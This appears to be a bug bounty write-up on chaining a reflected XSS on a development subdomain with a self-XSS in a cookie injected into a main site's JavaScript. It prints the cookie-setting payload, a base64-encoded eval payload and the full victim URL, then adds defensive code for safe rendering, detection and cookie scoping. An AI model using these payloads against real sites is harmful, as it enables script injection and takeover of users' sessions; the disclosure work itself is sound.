From Unexploited XSS To Self Stored XSS on victim Cookies
BugBounty | 2021. 3. 22. 06:01
Day #1
This is part 2 of this story. I will talk about a self XSS in cookies and how I exploited it through an out-of-scope subdomain. Our target is redact.com. First, how did I find the vulnerable cookie attribute? While browsing redact.com I stopped at the path www.redacted.com/redactedfolder/redactedpage/ID and used Param Miner (brute force) to look for hidden parameters. I found two, but unfortunately both were filtered, so I turned to guessing cookie parameters.
Finally I found a cookie attribute named visitor_id whose value was injected into the JS source code.
Now I have a self XSS, and it's out of scope. But subdomains are allowed to set cookies for the parent domain, so I will exploit it through an out-of-scope subdomain.
Day #2
I extracted subdomains, and after one or two hours I found a reflected XSS on a subdomain: http://dev-labs.redact.com/login?username=[Here]. So we will set the cookie from the subdomain for the main domain. (I hope you understand the exploitation; if not, please watch the video:
https://www.youtube.com/watch?v=ntWOiuKe5ts&feature=youtu.be&ab_channel=DawidCzagan)
So our exploit:
document.cookie='visitor_id=w0; domain=.redact.com; path=/;' ;document.location=" https://www.redact.com/redactfolder/redactpage/1337 "
Let's encode it:
</Script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxv YWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50Lmxv Y2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>
So now we have a valid PoC. We send the URL to the victim:
http://dev-labs.redact.com/login?username=</script><svg/onload=eval(atob('+ZG9jdW1lbnQuY29va2llPSd 2aXNpdG9yX2lkPXcwPC9zY3JpcHQPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0L mNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9y ZWRhY3RwYWdlLzEzMzci'))>
It will automatically redirect the victim to the main domain, with the visitor_id cookie carrying the payload, because we set document.location. It works :D
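As an added example (not code from the post or the program): the server-side pattern behind this bug, a cookie value written straight into inline JavaScript, beside a hardened version, plus a check for cookie values that would close a script element and a cookie attribute set that a subdomain cannot override. Function names and the sample value are assumptions.

```javascript
// Added defensive example, not code from the original post. The post's bug is a
// cookie value (visitor_id) written straight into inline JavaScript, and a
// subdomain being able to set that cookie for the parent domain.
// All function names below are hypothetical.

// Vulnerable pattern: string interpolation of the cookie value into a <script>.
// A value containing </script> closes the element and lets the rest of the
// value be parsed as HTML, which is what the post's payload relies on.
function renderVisitorScriptUnsafe(visitorId) {
  return `<script>var visitor_id = '${visitorId}';</script>`;
}

// Hardened pattern: serialise the value as a JSON string literal, then escape
// every character that could end the script element or break a JS string
// (<, >, &, U+2028, U+2029). The JS parser turns \u003c back into '<' inside
// the string, so legitimate values are unchanged.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderVisitorScriptSafe(visitorId) {
  return `<script>var visitor_id = ${jsStringLiteral(visitorId)};</script>`;
}

// Heuristic check for request logs or a WAF rule: does a cookie value contain
// a sequence that would terminate an inline script element or start a tag?
function cookieBreaksScript(value) {
  return /<\/|<svg|\bonload\s*=/i.test(value);
}

// Cookie scoping: the Domain attribute (domain=.redact.com in the post) is what
// lets dev-labs.redact.com plant the cookie for www.redact.com. A __Host-
// prefixed cookie must be Secure, have Path=/ and carry no Domain attribute,
// so a browser rejects a subdomain's attempt to set it for the parent domain.
function visitorCookieHeader(value) {
  return `__Host-visitor_id=${encodeURIComponent(value)}; Secure; Path=/; HttpOnly; SameSite=Lax`;
}

// Constructed sample value mirroring the shape of the post's payload.
const sampleValue = 'w0</script><svg/onload=alert(document.domain)>';
console.log(renderVisitorScriptUnsafe(sampleValue));
console.log(renderVisitorScriptSafe(sampleValue));
```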
Timeline
Jan 02 - Reported Via Hackerone
Jan 04 - HackerOne staff updated the severity from High to Medium (6.1)
Jan 07 - Report triaged and bounty paid by program staff
That's all, thank you very much for reading till the end. I hope you enjoyed it.
Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters